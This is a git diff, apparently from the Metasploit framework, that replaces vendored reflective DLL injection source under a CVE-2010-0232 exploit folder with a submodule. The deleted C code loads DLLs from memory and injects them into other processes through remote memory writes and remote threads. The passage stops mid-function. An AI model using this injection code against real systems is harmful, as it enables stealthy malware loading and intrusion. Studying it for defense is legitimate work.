diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000000..564edab544 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "external/source/ReflectiveDLLInjection"] + path = external/source/ReflectiveDLLInjection + url = https://github.com/rapid7/ReflectiveDLLInjection.git diff --git a/external/source/ReflectiveDLLInjection b/external/source/ReflectiveDLLInjection new file mode 160000 index 0000000000..88e8e5f109 --- /dev/null +++ b/external/source/ReflectiveDLLInjection @@ -0,0 +1 @@ +Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103 diff --git a/external/source/ReflectiveDllInjection_v1.0.zip b/external/source/ReflectiveDllInjection_v1.0.zip deleted file mode 100644 index 883acde770..0000000000 Binary files a/external/source/ReflectiveDllInjection_v1.0.zip and /dev/null differ diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c deleted file mode 100644 index a88d1d946e..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c +++ /dev/null @@ -1,116 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "GetProcAddressR.h" -//===============================================================================================// -// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which -// wont be able to resolve exported addresses in reflectivly loaded librarys. -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ) -{ - UINT_PTR uiLibraryAddress = 0; - FARPROC fpResult = NULL; - - if( hModule == NULL ) - return NULL; - - // a module handle is really its base address - uiLibraryAddress = (UINT_PTR)hModule; - - __try - { - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiNameOrdinals = 0; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - PIMAGE_DATA_DIRECTORY pDataDirectory = NULL; - PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL; - - // get the VA of the modules NT Header - pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew); - - pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions ); - - // get the VA for the array of name pointers - uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals ); - - // test if we are importing by name or by ordinal... - if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 ) - { - // import by ordinal... - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) ); - - // resolve the address for this imported function - fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // import by name... - DWORD dwCounter = pExportDirectory->NumberOfNames; - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray )); - - // test if we have a match... - if( strcmp( cpExportedFunctionName, lpProcName ) == 0 ) - { - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // calculate the virtual address for the function - fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray )); - - // finish... - break; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - fpResult = NULL; - } - - return fpResult; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h deleted file mode 100644 index 6f4729dd5d..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h +++ /dev/null @@ -1,36 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c deleted file mode 100644 index 88d5be96b9..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c +++ /dev/null @@ -1,233 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - // This will catch Win32 and WinRT. - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. - if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... - dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// -// Loads a DLL image from memory via its exported ReflectiveLoader function -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ) -{ - HMODULE hResult = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwOldProtect1 = 0; - DWORD dwOldProtect2 = 0; - REFLECTIVELOADER pReflectiveLoader = NULL; - DLLMAIN pDllMain = NULL; - - if( lpBuffer == NULL || dwLength == 0 ) - return NULL; - - __try - { - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( dwReflectiveLoaderOffset != 0 ) - { - pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset); - - // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader... - // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region - if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) ) - { - // call the librarys ReflectiveLoader... - pDllMain = (DLLMAIN)pReflectiveLoader(); - if( pDllMain != NULL ) - { - // call the loaded librarys DllMain to get its HMODULE - // Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only. - if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) ) - hResult = NULL; - } - // revert to the previous protection flags... - VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 ); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hResult = NULL; - } - - return hResult; -} -//===============================================================================================// -// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function -// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -// defined in order to use the correct RDI prototypes. -// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | -// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ -// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space. -// Note: This function currently cant inject accross architectures, but only to architectures which are the -// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64. -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ) -{ - LPVOID lpRemoteLibraryBuffer = NULL; - LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL; - HANDLE hThread = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwThreadId = 0; - - __try - { - do - { - if( !hProcess || !lpBuffer || !dwLength ) - break; - - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( !dwReflectiveLoaderOffset ) - break; - - // alloc memory (RWX) in the host process for the image... - lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - if( !lpRemoteLibraryBuffer ) - break; - - // write the image into the host process... - if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) ) - break; - - // add the offset to ReflectiveLoader() to the remote library address... - lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset ); - - // create a remote thread in the host process to call the ReflectiveLoader! - hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId ); - - } while( 0 ); - - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hThread = NULL; - } - - return hThread; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h deleted file mode 100644 index ad57808084..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h +++ /dev/null @@ -1,41 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); - -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h deleted file mode 100644 index 23d607ee00..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h +++ /dev/null @@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c deleted file mode 100644 index a302e3903d..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c +++ /dev/null @@ -1,599 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#pragma intrinsic( _ReturnAddress ) -// This function can not be inlined by the compiler or we will not get the address we expect. Ideally -// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of -// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics -// available (and no inline asm available under x64). -__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); } -//===============================================================================================// - -#ifdef ENABLE_OUTPUTDEBUGSTRING -#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str) -#else /* ENABLE_OUTPUTDEBUGSTRING */ -#define OUTPUTDBG(str) do{}while(0) -#endif - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA = NULL; - GETPROCADDRESS pGetProcAddress = NULL; - VIRTUALALLOC pVirtualAlloc = NULL; - NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; -#ifdef ENABLE_STOPPAGING - VIRTUALLOCK pVirtualLock = NULL; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - OUTPUTDEBUG pOutputDebug = NULL; -#endif - - USHORT usCounter; - - // the initial location of this image in memory - ULONG_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - ULONG_PTR uiBaseAddress; - - // variables for processing the kernels export table - ULONG_PTR uiAddressArray; - ULONG_PTR uiNameArray; - ULONG_PTR uiExportDir; - ULONG_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - ULONG_PTR uiHeaderValue; - ULONG_PTR uiValueA; - ULONG_PTR uiValueB; - ULONG_PTR uiValueC; - ULONG_PTR uiValueD; - ULONG_PTR uiValueE; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our callers return address. - uiLibraryAddress = caller(); - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else -#ifdef WIN_ARM - uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); -#else _WIN32 - uiBaseAddress = __readfsdword( 0x30 ); -#endif -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the module name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - 